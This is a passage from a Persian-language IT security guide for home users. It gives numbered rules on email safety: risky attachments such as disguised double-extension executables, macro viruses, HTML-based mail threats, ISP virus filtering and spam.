‫ﺍﺷﻜﺎﻻﺕ ﻣﻮﺟﻮﺩ ﺩﺭ ﺑﺮﻧﺎﻣـﺔ ﻣﻔـﺴﺮ ﺩﺳـﺘﻮﺭﺍﺕ ‪ HTML‬ﺭﺍﻳﺎﻧـﺔ‬
‫ﺷﻤﺎ ﺩﺍﺭﺩ‪.‬‬
‫ﭘﺴﺖ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﮔﻤﺮﺍﻩﻛﻨﻨﺪﻩ ﺍﺳﺖ‬
‫ﻗﺎﻧﻮﻥ ﭘﻨﺠﻢ‪:‬‬
‫ﺑﺮﻧﺎﻣﺔ ﭘﺴﺖ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﺧﻮﺩ ﺭﺍ ﻃﻮﺭﻱ ﭘﻴﻜﺮﺑﻨـﺪﻱ‬
‫ﻧﻤﺎﻳﻴﺪ ﻛﻪ ﺿﻤﺎﺋﻢ ﺭﺍ ﺑﺼﻮﺭﺕ ﺧﻮﺩﻛﺎﺭ ﺑﺎﺯ ﻧﻜﻨﺪ‪.‬‬
‫ﻫﺮ ﻓﺮﺩﻱ ﻛﻪ ﺁﺩﺭﺱ ﭘﺴﺖ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﺷﻤﺎ ﺭﺍ ﺑﺪﺍﻧﺪ ﻳـﺎ ﺑﺘﻮﺍﻧـﺪ‬
‫ﺁﻧﺮﺍ ﺣﺪﺱ ﺑﺰﻧﺪ ﻣﻲﺗﻮﺍﻧﺪ ﺑﺮﺍﻱ ﺷﻤﺎ ﻧﺎﻣﺔ ﺣﺎﻭﻱ ﺿﻤﻴﻤﻪ ﺍﺭﺳـﺎﻝ‬
‫ﻛﻨﺪ‪ .‬ﺍﻳﻦ ﺿﻤﻴﻤﻪ ﻣﻤﻜـﻦ ﺍﺳـﺖ ﻣﻔﻴـﺪ ﻭ ﻗﺎﺑـﻞ ﺍﺳـﺘﻔﺎﺩﻩ ﻭ ﻳـﺎ‬
‫ﻭﻳﺮﻭﺱ‪ ،‬ﻛﺮﻡ‪ ،‬ﻳﺎ ﺗﺮﺍﻭﺍﻳﻲ ﺑﺎﺷﺪ ﻛﻪ ﺑﺘﻮﺍﻧﺪ ﺁﺳـﻴﺒﻬﺎﻱ ﺟـﺪﻱ ﺑـﻪ‬
‫ﺳﻴــﺴﺘﻢ ﺷــﻤﺎ ﻭﺍﺭﺩ ﻧﻤﺎﻳــﺪ‪ .‬ﺍﻛﺜــﺮ ﺑﺮﻧﺎﻣــﻪﻫــﺎﻱ ﺟﺪﻳــﺪ ﭘــﺴﺖ‬
‫ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﺿﻤﺎﻳﻢ ﺭﺍ ﻗﺒﻞ ﺍﺯ ﺍﺟﺎﺯﺓ ﺷﻤﺎ ﺑﺎﺯ ﻧﻤﻲﻛﻨﻨﺪ‪ ،‬ﺍﻣﺎ ﺍﮔـﺮ‬
‫ﺑﺮﻧﺎﻣﺔ ﺷﻤﺎ ﺑﮕﻮﻧﻪﺍﻱ ﺑﺎﺷﺪ ﻛﻪ ﺁﻧﺮﺍ ﺑﺼﻮﺭﺕ ﺧﻮﺩﻛﺎﺭ ﺑـﺎﺯ ﻧﻤﺎﻳـﺪ‪،‬‬
‫ﺑﺎﻳﺪ ﺑﺘﻮﺍﻧﻴﺪ ﺍﻳﻦ ﮔﺰﻳﻨﻪ ﺭﺍ ﻏﻴﺮﻓﻌﺎﻝ ﻛﻨﻴﺪ‪.‬‬
‫ﻗﺎﻧﻮﻥ ﺷﺸﻢ‪:‬‬
‫ﻗﺒﻞ ﺍﺯ ﺑﺎﺯ ﻛﺮﺩﻥ ﻫﺮ ﺿﻤﻴﻤﻪ ﺑﻪ ﻧﺎﻡ ﺁﻥ ﺩﻗﺖ ﻛﻨﻴﺪ ﺗﺎ‬
‫ﻣﻄﻤﺌﻦ ﺷﻮﻳﺪ ﻛﻪ ﻳﻚ ﺑﺮﻧﺎﻣﺔ ﺍﺟﺮﺍﻳﻲ ﻧﻴﺴﺖ‪.‬‬
‫ﻻ ﺿـﻤﺎﻳﻢ‬
‫ﻧﻮﻳﺴﻨﺪﮔﺎﻥ ﻭﻳﺮﻭﺱ ﺑﺴﻴﺎﺭ ﺯﻳﺮﻙ ﻫﺴﺘﻨﺪ‪ .‬ﺁﻧﻬﺎ ﻣﻌﻤﻮ ﹰ‬
‫ﺭﺍ ﺑــﺎ ﻧﺎﻣﻬــﺎﻳﻲ ﭼــﻮﻥ ‪ budget.xls.vbs‬ﺍﺭﺳــﺎﻝ ﻣــﻲﻛﻨﻨــﺪ‪.‬‬
‫ﻧﺎﻇﺮﻱ ﻛﻪ ﻧﻤﻲ ﺩﺍﻧﺪ ‪ vbs‬ﭼﻴﺴﺖ ﺗﺼﻮﺭ ﻣـﻲﻛﻨـﺪ ﻳـﻚ ﻓﺎﻳـﻞ‬
‫‪ Excel‬ﺑــﺎ ﻧــﺎﻡ ‪ budget‬ﺍﺯ ﺳــﻮﻱ ﻣﺎﻳﻜﺮﻭﺳــﺎﻓﺖ ﺑــﺮﺍﻱ ﻭﻱ‬
‫ﺍﺭﺳﺎﻝ ﺷﺪﻩ )ﺧﺼﻮﺻﹰﺎ ﺩﺭ ﺣﺎﻟﺘﻲ ﺍﺯ ﺗﻨﻈﻴﻤﺎﺕ ﻛﻪ ﺳﻴﺴﺘﻢﻋﺎﻣﻞ ﭘﺴﻮﻧﺪﻫﺎﻱ‬
‫ﺷﻨﺎﺧﺘﻪﺷﺪﻩ ﺭﺍ ﺑﻪ ﻛﺎﺭﺑﺮ ﻧﻤﺎﻳﺶ ﻧﻤﻲﺩﻫﺪ(؛ ﺍﻣﺎ ﺍﻳـﻦ ﻓﺎﻳـﻞ ﺩﺭ ﺣﻘﻴﻘـﺖ‬
‫ﻳــﻚ ﺑﺮﻧﺎﻣــﺔ ﺍﺟﺮﺍﻳــﻲ ‪ Visual Basic‬ﺍﺳــﺖ ﻛــﻪ ﻧــﺎﻡ ﺁﻥ‬
‫‪ budget.xls‬ﻣﻲﺑﺎﺷﺪ‪ xls :‬ﺗﻨﻬﺎ ﺑﺨﺸﻲ ﺍﺯ ﻧﺎﻡ ﺍﻳﻦ ﻓﺎﻳﻞ ﺍﺳﺖ‬
‫ﻭ ﻫﻴﭻ ﺍﺭﺗﺒﺎﻃﻲ ﺑﺎ ‪ Excel‬ﻧﺪﺍﺭﺩ‪ .‬ﺩﺭ ﺑﺪﺗﺮﻳﻦ ﺣﺎﻻﺕ ﺍﻳﻦ ﺑﺮﻧﺎﻣﻪ‬
‫ﻣﻤﻜﻦ ﺍﺳﺖ ﺑﺘﻮﺍﻧﺪ ﺗﻤﺎﻣﻲ ﺩﻳﺴﻚ ﺳﺨﺖ ﺳﻴﺴﺘﻢ ﺷﻤﺎ ﺭﺍ ﭘـﺎﻙ‬
‫ﻧﻤﺎﻳﺪ‪.‬‬
‫ﺩﺭ ﺑــﺴﻴﺎﺭﻱ ﺍﺯ ﻣﻮﺍﻗــﻊ ﺁﺩﺭﺱ ﭘــﺴﺖ ﺍﻟﻜﺘﺮﻭﻧﻴﻜــﻲ ﻛــﻪ ﺟﻠــﻮﻱ‬
‫ﻋﺒﺎﺭﺕ "ﻓﺮﺳﺘﻨﺪﻩ" ﻗﺮﺍﺭ ﻣﻲ ﮔﻴﺮﺩ ﻣﻌﺘﺒﺮ ﻧﻴﺴﺖ‪ .‬ﺍﻳﻦ ﻗﺎﺑﻠﻴﺘﻲ ﺍﺳﺖ‬
‫ﻛﻪ ﻫﺮﺯﻧﺎﻣﻪﻧﻮﻳﺲﻫﺎ ﺁﻧﺮﺍ ﺑﺮﺍﻱ ﺳـﻮﺀ ﺍﺳـﺘﻔﺎﺩﻩ ﺍﺯ ﺳﻴـﺴﺘﻢ ﺷـﻤﺎ‬
‫ﺑﻜﺎﺭ ﻣﻲﺑﺮﻧﺪ‪ .‬ﮔﺎﻫﻲ ﺍﻭﻗﺎﺕ ﺍﮔﺮ ﻛﻞ ﺳﺮﺁﻳﻨﺪ‪ ٦٦‬ﺭﺍ ﺑﺮﺭﺳﻲ ﻛﻨﻴـﺪ‬
‫ﻣﻤﻜﻦ ﺍﺳﺖ ﺑﺘﻮﺍﻧﻴﺪ ﻣﺘﻮﺟﻪ ﺷﻮﻳﺪ ﻛﻪ ﺍﻳﻦ ﻧﺎﻣﻪ ﻭﺍﻗﻌﹰﺎ ﺍﺯ ﻛﺠﺎ ﻭ ﺍﺯ‬
‫ﺳﻮﻱ ﭼﻪ ﻛﺴﻲ ﺍﺭﺳﺎﻝ ﺷﺪﻩ ﺍﺳﺖ‪.‬‬
‫ﻫﺮﮔﺰ ﺿﻤﻴﻤﻪ ﺍﻱ ﺭﺍ ﻛـﻪ ﺍﺯ ﺟﺎﻧـﺐ ﺍﻓـﺮﺍﺩ ﻧﺎﺷـﻨﺎﺱ‬
‫ﺑﺮﺍﻳﺘﺎﻥ ﺍﺭﺳﺎﻝ ﺷﺪﻩ ﺍﺳﺖ ﺑﺎﺯ ﻧﻜﻨﻴـﺪ؛ ﻣﮕـﺮ ﺍﻳﻨﻜـﻪ‬
‫ﺍﻃﻤﻴﻨﺎﻥ ﺩﺍﺷﺘﻪ ﺑﺎﺷﻴﺪ ﻛﻪ ﺁﻥ ﻧﻮﻉ ﻓﺎﻳﻞ ﻧﻤـﻲﺗﻮﺍﻧـﺪ‬
‫ﺣﺎﻭﻱ ﻛﺪ ﻣﺨﺮﺏ ﺑﺎﺷﺪ‪.‬‬
‫ﭼﮕﻮﻧﻪ ﻣﻲﺗﻮﺍﻧﻴﺪ ﺍﺯ ﺧﻮﺩ ﻣﺤﺎﻓﻈﺖ ﻧﻤﺎﻳﻴﺪ؟‬
‫ﺑﻪ ﺧﺎﻃﺮ ﺩﺍﺷﺘﻪ ﺑﺎﺷﻴﺪ ﺑﺮﻧﺎﻣﻪﻫـﺎﻳﻲ ﻣﺜـﻞ ‪Microsoft Word‬‬
‫‪Header‬‬
‫‪66‬‬
‫ﻗﺎﻧﻮﻥ ﻫﻔﺘﻢ‪:‬‬
‫)ﭘﺮﺩﺍﺯﺷﮕﺮ ﻛﻠﻤﺎﺕ( ﻭ ‪) Microsoft Excel‬ﺻﻔﺤﻪ ﮔـﺴﺘﺮﺩﺓ ﺩﺍﺩﻩ( ﻭ‬
‫ﺗﻤﺎﻣﻲ ﺑﺮﻧﺎﻣﻪﻫﺎﻱ ﻣـﺸﺎﺑﻪ‪ ،‬ﺩﺍﺭﺍﻱ ﻗﺎﺑﻠﻴـﺖ ﺍﺳـﺘﻔﺎﺩﻩ ﺍﺯ ‪Macro‬‬
‫ﻫﺴﺘﻨﺪ ﻛﻪ ﻣﻲ ﺗﻮﺍﻧﺪ ﺣﺎﻭﻱ ﻭﻳﺮﻭﺱ ﺑﺎﺷﺪ‪ .‬ﺣﺘﻲ ﻓﺎﻳﻠﻬﺎﻱ ‪PDF‬‬
‫ﻧﻴﺰ ﻣﻲﺗﻮﺍﻧﻨﺪ ﺣﺎﻭﻱ ﻗﻄﻌﻪ ﺑﺮﻧﺎﻣﻪﻫﺎﻱ ﻣﺨﺮﺏ ﺑﺎﺷﻨﺪ )ﺍﮔﺮﭼﻪ ﺍﻳـﻦ‬
‫‪٨١‬‬
‫ﺑﺨﺶ ﺩﻭﻡ‪ :‬ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ ﻭ ﮐﺎﺭﺑﺮﺍﻥ ﻣﻨﻔﺮﺩ‬
‫ﻓﺎﻳﻠﻬﺎ ﺗﻨﻬﺎ ﺯﻣﺎﻧﻲ ﻣﻲﺗﻮﺍﻧﻨﺪ ﺧﻄﺮﻧـﺎﻙ ﺑﺎﺷـﻨﺪ ﻛـﻪ ﺑـﺎ ﻧـﺮﻡﺍﻓـﺰﺍﺭ ﻛـﺎﺭﺑﺮﺩﻱ‬
‫‪ Adobe Acrobat Professional‬ﺑــﺎﺯ ﺷــﻮﻧﺪ ﻭ ﺑــﺎﺯﻛﺮﺩﻥ ﺁﻧﻬــﺎ ﺑــﺎ‬
‫ﺑﺮﻧﺎﻣﻪﻫﺎﻳﻲ ﭼﻮﻥ ‪ Adobe Acrobat Reader‬ﻛﻪ ﻛﺎﺭﺑﺮﺩ ﺑﻴﺸﺘﺮﻱ ﻣﻴـﺎﻥ‬
‫ﺍﻓﺮﺍﺩ ﺩﺍﺭﺩ ﺧﻄﺮ ﺧﺎﺻﻲ ﺩﺭ ﭘﻲ ﻧﺨﻮﺍﻫﺪ ﺩﺍﺷﺖ(‪ .‬ﺑﺎ ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﺭﺍﻫﻨﻤـﺎﻱ‬
‫ﻛﺎﺭﺑﺮﻱ ﻭ ﻳﺎ ﺻﻔﺤﺎﺕ ﺭﺍﻫﻨﻤﺎ ﻣﻲﺗﻮﺍﻧﻴﺪ ﺑﺮﺭﺳﻲ ﻛﻨﻴﺪ ﻛﻪ ﭼﮕﻮﻧﻪ‬
‫ﻣﻲﺗﻮﺍﻥ ﺑﻌﻀﻲ ﻗﺎﺑﻠﻴﺘﻬﺎ )ﺧﺼﻮﺻﹰﺎ ﺁﻧﻬﺎﻳﻲ ﻛﻪ ﺩﺭ ﺳﻴﺴﺘﻢ ﺑﻨـﺪﺭﺕ ﻣـﻮﺭﺩ‬
‫ﺍﺳﺘﻔﺎﺩﻩ ﻗﺮﺍﺭ ﻣﻲﮔﻴﺮﻧﺪ( ﺭﺍ ﺍﺯ ﻛﺎﺭ ﺍﻧﺪﺍﺧﺖ‪.‬‬
‫ﻫﺮﮔﺰ ﺿﻤﺎﺋﻢ ﺍﺭﺳﺎﻟﻲ ﺍﺯ ﺟﺎﻧﺐ ﺍﻓﺮﺍﺩ ﺷﻨﺎﺧﺘﻪﺷـﺪﻩ ﻭ‬
‫ﻗﺎﺑﻞ ﺍﻋﺘﻤﺎﺩ ﺭﺍ ﻧﻴﺰ ﺑﺎﺯ ﻧﻜﻨﻴﺪ؛ ﻣﮕـﺮ ﺍﻳﻨﻜـﻪ ﺍﻃﻤﻴﻨـﺎﻥ‬
‫ﺩﺍﺷﺘﻪ ﺑﺎﺷﻴﺪ ﻛﻪ ﻓـﺮﺩ ﻣـﻮﺭﺩ ﻧﻈـﺮ ﺍﻳـﻦ ﺿـﻤﺎﺋﻢ ﺭﺍ‬
‫ﺑﺮﺭﺳﻲ ﻛﺮﺩﻩ ﻭ ﺑﺎ ﻣﻼﺣﻈـﻪ ﻛﺎﻣـﻞ ﺑﺮﺍﻳﺘـﺎﻥ ﺍﺭﺳـﺎﻝ‬
‫ﻧﻤﻮﺩﻩ ﺍﺳﺖ‪.‬‬
‫ﺍﻣﻜﺎﻥ ﺩﺍﺭﺩ ﻛﻪ ﻣﺎﺷﻴﻦ ﺩﻭﺳﺖ ﺷﻤﺎ ﻭﻳﺮﻭﺳﻲ ﺩﺍﺷـﺘﻪ ﺑﺎﺷـﺪ ﻛـﻪ‬
‫ﺑﺪﻭﻥ ﺍﻃﻼﻉ ﻭﻱ ﻓﺎﻳﻠﻬﺎﻱ ﺁﻟـﻮﺩﻩ ﺭﺍ ﺑـﻪ ﻫﻤـﺔ ﺍﻓـﺮﺍﺩﻱ ﻛـﻪ ﺩﺭ‬
‫ﻓﻬﺮﺳﺖ ﺁﺩﺭﺳﻬﺎﻱ ﻭﻱ ﻫﺴﺘﻨﺪ ﺍﺭﺳﺎﻝ ﻧﻤﺎﻳﺪ‪.‬‬
‫ﻗﺎﻧﻮﻥ ﻧﻬﻢ‪:‬‬
‫ﭘﻴﻜﺮﺑﻨﺪﻱ ﺑﺮﻧﺎﻣﺔ ﭘﺴﺖ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﺧﻮﺩ ﺭﺍ ﺑﺮﺭﺳﻲ‬
‫ﻛﻨﻴﺪ ﺗﺎ ﻓﺎﻳﻠﻬﺎﻱ ‪ HTML‬ﺗﻔﻨﻨﻲ‪ ٦٧‬ﺭﺍ ﭘﺮﺩﺍﺯﺵ ﻧﻜﻨﺪ ﻭ‬
‫ﻓﺎﻳﻠﻬﺎﻱ ﺁﻟﻮﺩﻩ ﺭﺍ ﺑﻪ ﺭﺍﻳﺎﻧﻪﻫﺎﻱ ﺩﻳﮕﺮ ﺍﺭﺳﺎﻝ ﻧﻨﻤﺎﻳﺪ‪.‬‬
‫ﺍﺯ ‪ ISP‬ﺧﻮﺩ ﺳـﺆﺍﻝ ﻛﻨﻴـﺪ ﻛـﻪ ﺁﻳـﺎ ﻗﺒـﻞ ﺍﺯ ﺍﺭﺳـﺎﻝ‬
‫ﻧﺎﻣﻪﻫﺎﻱ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ‪ ،‬ﺁﻧﻬﺎ ﺭﺍ ﺍﺯ ﻧﻈﺮ ﺩﺍﺷﺘﻦ ﻭﻳﺮﻭﺱ‬
‫ﻭ ﺗﻬﺪﻳﺪﺍﺕ ﻣﺸﺎﺑﻪ ﺑﺮﺭﺳﻲ ﻣﻲﻛﻨﺪ ﻳﺎ ﺧﻴﺮ‪.‬‬
‫ﺑﻪ ﺩﻟﻴﻞ ﺍﻓﺰﺍﻳﺶ ﺭﻭﺯﺍﻓـﺰﻭﻥ ﻓﻌﺎﻟﻴـﺖ ﻛﺮﻣﻬـﺎ ﻭ ﻭﻳﺮﻭﺳـﻬﺎ ﺍﻛﺜـﺮ‬
‫‪ISP‬ﻫﺎ ﺍﻳﻨﻜﺎﺭ ﺭﺍ ﺍﻧﺠﺎﻡ ﻣﻲﺩﻫﻨﺪ‪ .‬ﺗﻮﺟﻪ ﺩﺍﺷﺘﻪ ﺑﺎﺷﻴﺪ ﻛـﻪ ﻧﺒﺎﻳـﺪ‬
‫ﺗﻮﻗﻊ ﺩﺍﺷﺖ ﻛﻪ ﻏﺮﺑﺎﻝﺳﺎﺯﻱ ‪ ISP‬ﺷﻤﺎ ﺻﺪ ﺩﺭﺻـﺪ ﺛﻤـﺮﺑﺨﺶ‬
‫ﺑﺎﺷﺪ‪ ،‬ﺍﻣﺎ ﻋﻤﻠﻜﺮﺩ ﭘﻴﺸﮕﻴﺮﺍﻧﺔ ‪ISP‬ﻫﺎ ﻣـﻲﺗﻮﺍﻧـﺪ ﺑـﻪ ﺗﻼﺷـﻬﺎﻱ‬
‫ﺷﻤﺎ ﺩﺭ ﺑﺮﻗﺮﺍﺭﻱ ﺍﻣﻨﻴﺖ ﻛﻤﻚ ﻛﻨﺪ‪ .‬ﺍﮔﺮ ‪ ISP‬ﺷـﻤﺎ ﺍﺯ ﻣـﺴﺎﺋﻞ‬
‫ﺍﻣﻨﻴﺘﻲ ﺁﮔﺎﻩ ﻧﻴﺴﺖ ﺑﻬﺘﺮ ﺍﺳﺖ ﺑﺮﺍﻱ ﺍﺭﺍﺋﻪ ﺧـﺪﻣﺎﺕ ﺍﻣـﻦﺗـﺮ ﺑـﻪ‬
‫ﻼ‬
‫ﺧﻮﺩﺗﺎﻥ ﻭ ﻧﻴﺰ ﺩﻳﮕﺮ ﻣﺸﺘﺮﻳﺎﻥ ﺑـﺎ ﺁﻧﻬـﺎ ﻫﻤﻜـﺎﺭﻱ ﻛﻨﻴـﺪ‪ .‬ﻣـﺜ ﹰ‬
‫ﻣﻲﺗﻮﺍﻧﻴﺪ ﻳﻚ ﻧﺴﺨﻪ ﺍﺯ ﻛﺘﺎﺑﻲ ﻛﻪ ﻫﻢ ﺍﻛﻨﻮﻥ ﻣـﺸﻐﻮﻝ ﻣﻄﺎﻟﻌـﻪ‬
‫ﺁﻥ ﻫﺴﺘﻴﺪ ﺭﺍ ﺑﺼﻮﺭﺕ ﺭﺍﻳﮕﺎﻥ ﺑﻪ ﺁﻧﻬﺎ ﻫﺪﻳﻪ ﻧﻤﺎﻳﻴﺪ!‬
‫ﻫﺮﺯﻧﺎﻣﻪ‬
‫ﻫﺮﺯﻧﺎﻣﻪ‪ ٦٩‬ﻧﺎﻣﻲ ﺍﺳﺖ ﻛﻪ ﺑﺮﺍﻱ ﻧﺎﻣﻪ ﻫﺎﻱ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﻧﺎﺧﻮﺍﺳﺘﻪ‬
‫ﺑﻜﺎﺭ ﻣﻲﺭﻭﺩ‪ ،‬ﺧﺼﻮﺻﹰﺎ ﻧﺎﻣﻪﻫـﺎﻱ ﺗﺠـﺎﺭﻱ ﻛـﻪ ﺍﺯ ﻃـﺮﻑ ﺍﻓـﺮﺍﺩ‬
‫ﻻ ﺑﺮ ﺍﺳـﺎﺱ ﺍﻳـﻦ ﺑـﺎﻭﺭ ﻛـﻪ‬
‫ﻧﺎﺷﻨﺎﺱ ﻭ ﺑﺼﻮﺭﺕ ﻣﺘﻌﺪﺩ ‪ -‬ﺍﺣﺘﻤﺎ ﹰ‬
‫ﺩﺭﻳﺎﻓﺖ ﻛﻨﻨﺪﻩ ﺑﻪ ﻣﺤﺼﻮﻻﺕ ﺁﻧﻬـﺎ ﻋﻼﻗـﻪﻣﻨـﺪ ﺧﻮﺍﻫـﺪ ﺷـﺪ ‪-‬‬
‫ﺍﺭﺳﺎﻝ ﻣﻲ ﺷﻮﻧﺪ‪ .‬ﺩﺭ ﺳـﺎﻟﻬﺎﻱ ﺍﺧﻴـﺮ ﺗﻌـﺪﺍﺩ ﻫﺮﺯﻧﺎﻣـﻪ ﻫـﺎ ﺑﻄـﻮﺭ‬
‫ﭼﺸﻤﮕﻴﺮﻱ ﺍﻓﺰﺍﻳﺶ ﻳﺎﻓﺘﻪ ﺍﺳﺖ‪ .‬ﺩﺭ ﺳﺎﻝ ‪ ۲۰۰۳‬ﺑـﻴﺶ ﺍﺯ ‪%۵۰‬‬
‫ﺍﺯ ﻛﻞ ﻧﺎﻣﻪ ﻫﺎﻱ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﺗﺒﺎﺩﻝﺷـﺪﻩ ﺩﺭ ﺍﻳﻨﺘﺮﻧـﺖ ﻫﺮﺯﻧﺎﻣـﻪ‬
‫ﺑﻮﺩﻩ ﺍﺳﺖ! ﺑﺴﻴﺎﺭﻱ ﺍﻓﺮﺍﺩ ﻫﻢ ﺍﻛﻨﻮﻥ ﺑﻪ ﺍﺯﺍﻱ ﺩﺭﻳﺎﻓﺖ ﻫـﺮ ﻳـﻚ‬
‫ﻧﺎﻣﺔ ﻣﻌﺘﺒﺮ ﺣﺪﻭﺩ ‪ ۱۰‬ﻫﺮﺯﻧﺎﻣﻪ ﺩﺭﻳﺎﻓﺖ ﻣﻲﻛﻨﻨﺪ‪.‬‬
‫ﺍﻳﻦ ﺑﺪﺍﻥ ﻣﻌﻨﺎﺳﺖ ﻛﻪ ﻣﻤﻜﻦ ﺍﺳﺖ ﺑﻌﻀﻲ ﺍﺯ ﻗﺎﺑﻠﻴﺘﻬﺎﻱ ﺗﺰﺋﻴﻨﻲ‬
‫ﻧﺎﻣﻪﻫﺎﻱ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﺭﺍ ﺍﺯ ﺩﺳﺖ ﺑﺪﻫﻴﺪ‪ ،‬ﻭﻟﻲ ﺩﺭ ﻋﻮﺽ ﻛﻨﺘﺮﻝ‬
‫ﺑﻬﺘﺮﻱ ﺭﻭﻱ ﻋﻤﻠﻜﺮﺩ ﺑﺮﻧﺎﻣﺔ ﭘـﺴﺖ ﺍﻟﻜﺘﺮﻭﻧﻴﻜـﻲ ﺧـﻮﺩ ﺑﺪﺳـﺖ‬
‫ﺁﻭﺭﻳﺪ‪ .‬ﺗﻮﺟﻪ ﺩﺍﺷﺘﻪ ﺑﺎﺷﻴﺪ ﻛﻪ ﺩﺭ ﺑﺮﺧـﻲ ﺍﺯ ﺑﺮﻧﺎﻣـﻪﻫـﺎﻱ ﭘـﺴﺖ‬
‫ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﺑﺮﺍﻱ ﺍﺟﺮﺍ ﺷﺪﻥ ﻛـﺪ ‪ HTML‬ﺣﺘـﻲ ﻻﺯﻡ ﻧﻴـﺴﺖ‬
‫ﭘﻴﺎﻣﻲ ﻛﻪ ﺣﺎﻭﻱ ﻛﺪ ‪ HTML‬ﺍﺳﺖ ﺭﺍ ﺑﺎﺯ ﻧﻤﺎﻳﻴﺪ ﻭ ﺑـﻪ ﻧﻤـﺎﻳﺶ‬
‫ﺩﺭ ﺁﻣﺪﻥ ﺁﻥ ﭘﻴﺎﻡ ﺩﺭ ﺻﻔﺤﺔ ﭘﻴﺶﻧﻤﺎﻳﺶ‪ ٦٨‬ﺑﺮﺍﻱ ﺍﺟﺮﺍ ﺷﺪﻥ ﻛﺪ‬
‫ﻛﺎﻓﻲ ﺍﺳﺖ‪ .‬ﻋﻠﻴﺮﻏﻢ ﺍﻳﻨﻜﻪ ﻧﺎﻣﺔ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﻣـﻲﺗﻮﺍﻧـﺪ ﺣـﺎﻭﻱ‬
‫ﻗﻄﻌﻪ ﺑﺮﻧﺎﻣﻪﻫﺎﻱ ‪ HTML‬ﺑﺎﺷـﺪ ﺍﻣـﺎ ﺑـﺴﻴﺎﺭﻱ ﺍﺯ ﻣﺮﻭﺭﮔﺮﻫـﺎ ﻭ‬
‫ﺑﺮﻧﺎﻣــﻪﻫــﺎﻱ ﭘــﺴﺖ ﺍﻟﻜﺘﺮﻭﻧﻴﻜــﻲ ﺑــﻪ ﺷــﻤﺎ ﺍﺟــﺎﺯﻩ ﻣــﻲﺩﻫﻨــﺪ‬
‫‪ ،Javascript ،cookie‬ﻭ ‪ plug-in‬ﺻــﻔﺤﺎﺗﻲ ﻛــﻪ ﺑﻌﻨــﻮﺍﻥ‬
‫ﺑﺨﺸﻲ ﺍﺯ ﻧﺎﻣـﺔ ﺍﻟﻜﺘﺮﻭﻧﻴﻜـﻲ ﺩﺭﻳﺎﻓـﺖ ﻣـﻲﺷـﻮﻧﺪ ﺭﺍ ﻏﻴﺮﻓﻌـﺎﻝ‬
‫ﻧﻤﺎﻳﻴﺪ‪.‬‬
‫ﺍﮔــﺮ ﺩﺭ ﻓﻴﻠــﺪ "ﻣﻮﺿــﻮﻉ" ﻫﺮﺯﻧﺎﻣــﻪﻫــﺎ ﻋﺒﺎﺭﺗﻬــﺎﻳﻲ ﻧﻈﻴــﺮ‬
‫"**‪ "**SPAM‬ﻭﺟﻮﺩ ﻣﻲﺩﺍﺷﺖ‪ ،‬ﺁﻧﮕﺎﻩ ﻣﻲ ﺗﻮﺍﻧﺴﺘﻴﻢ ﺑﻪ ﺁﺳـﺎﻧﻲ‬
‫ﺗﻤﺎﻣﻲ ﺁﻧﻬﺎ ﺭﺍ ﺣﺬﻑ ﻛﻨﻴﻢ‪ .‬ﻗﻮﺍﻧﻴﻦ ﻣﺼﻮﺏ ﻗﻀﺎﻳﻲ ﺣﻜﻢ ﻣﻲﻛﻨﺪ‬
‫ﻛﻪ ﻫﺮ ﻧﺎﻣﺔ ﺍﻟﻜﺘﺮﻭﻧﻴﻜـﻲ ﻧﺎﺧﻮﺍﺳـﺘﻪ ﻛـﻪ ﺍﺯ ﺳـﻮﻱ ﺷـﺮﻛﺘﻬﺎﻱ‬
‫ﺗﺠﺎﺭﻱ ﺍﺭﺳﺎﻝ ﺷﻮﺩ ﭘﻴﮕﺮﺩ ﻗﺎﻧﻮﻧﻲ ﺧﻮﺍﻫﺪ ﺩﺍﺷﺖ‪ .‬ﺑﺎ ﺍﻳـﻦ ﻭﺟـﻮﺩ‬
‫ﺑﻪ ﺩﻟﻴﻞ ﺣﺠﻢ ﻭﺳـﻴﻊ ﻫﺮﺯﻧﺎﻣـﻪﻫـﺎ ﻭ ﻧﻴـﺰ ﺗﻮﺍﻧﺎﻳﻴﻬـﺎﻱ ﻣﺤـﺪﻭﺩ‬
‫ﻧﻴﺮﻭﻫﺎﻱ ﺍﻧﺘﻈﺎﻣﻲ ﺩﺭﺣﺎﻝ ﺣﺎﺿﺮ ﺍﺟﺮﺍﻱ ﺍﻳﻦ ﻧﻮﻉ ﻗﻮﺍﻧﻴﻦ ﭼﻨﺪﺍﻥ‬
‫ﻋﻤﻠﻲ ﻧﻴﺴﺖ‪ .‬ﻫﺮﻛﺲ ﺑﺎﻳﺪ ﺑﺪﻭﻥ ﺧﻮﺍﻧﺪﻥ ﻫﺮﺯﻧﺎﻣﻪ ﻭ ﻳـﺎ ﺍﺭﺳـﺎﻝ‬
‫ﺍﺧﻄﺎﺭ ﺑﻪ ﻳﻚ ﺳﻴـﺴﺘ ﹺﻢ ﺷـﻠﻮ ﹺﻍ ﺩﺭﻳﺎﻓـﺖ ﺷـﻜﺎﻳﺖ‪ ،‬ﻳـﻚ ﺭﻭﺵ‬
‫ﻣﻨﻄﻘﻲ ﺑﺮﺍﻱ ﺗﺸﺨﻴﺺ ﻭ ﺣﺬﻑ ﺁﻥ ﺩﺍﺷﺘﻪ ﺑﺎﺷﺪ‪.‬‬
‫‪67‬‬
‫‪68‬‬
‫‪69‬‬
‫‪Fancy HTML‬‬
‫‪Preview Screen‬‬
‫‪Spam‬‬
‫ﺑﺨﺶ ﺩﻭﻡ‬
‫ﻗﺎﻧﻮﻥ ﻫﺸﺘﻢ‪:‬‬
‫ﻗﺎﻧﻮﻥ ﺩﻫﻢ‪:‬‬
‫‪٨٢‬‬
‫ﺭﺍﻫﻨﻤﺎﻱ ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ‬
